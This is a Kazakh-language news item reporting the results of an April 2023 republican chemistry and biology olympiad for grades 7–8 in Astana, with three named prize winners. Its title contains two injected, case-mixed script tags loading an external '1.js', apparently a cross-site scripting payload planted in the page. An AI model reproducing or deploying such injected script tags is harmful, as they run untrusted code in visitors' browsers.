7-8 сынып оқушылары арасында химия және биология пәндері бойынша республикалық жасөспірімдер олимпиадасын туралы қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.04.2023

2023 жылғы 26-28 сәуір аралығында Астана қаласының Қаныш Сәтбаев атындағы және Қадыр Мырза Әли атындағы BINOM мектептерінің базасында 7-8 сынып оқушылары арасында химия және биология пәндері бойынша республикалық жасөспірімдер олимпиадасы өтті.

Олимпиаданың мақсаты мен міндеттері: химия, биология пәндерін тереңдетіп оқуға оқушылардың қызығушылықтарын арттыру, олимпиадаларға дайындық жүйесін жоғары деңгейде жетілдіру, олимпиадалық резервті қалыптастыру.

Олимпиада 2 турдан өтті:

  • 1 тур-теориялық (26 сәуір);
  • 2 тур-практикалық (27 сәуір).

Олимпиадаға 7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы жалпы білім беретін пәндер бойынша республикалық олимпиадасының ІІІ (облыстық) кезеңінің қорытындысы бойынша жоғары нәтиже көрсеткен 8 оқушылар қатысты (биологиядан 7-сыныптан – 2, 8 сыныптан – 2 оқушы; химиядан 7-сыныптан – 2, 8-сыныптан – 2 оқушы).

Олимпиада нәтижесі:

1. Биология пәні бойынша Хамитов Максат – Көкшетау қаласы, "Білім-инновация" лицей-интернатының 8-сынып оқушысы – 2 орын;

2. Химия пәні бойынша Егінбай Ақерке – Щучинск қаласының "Білім-инновация" IT лицей-интернатының 8-сынып оқушысы – 3 орын;

3. Биология пәні бойынша Бегзан Зерде – Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 7-сынып оқушысы – 3 орын.

Олимпиададағы жүлдегерлерін шын жүректен құттықтаймыз!!!

Просмотров: 263


Пікір қосу



Деректерді қолтаңбаға қосу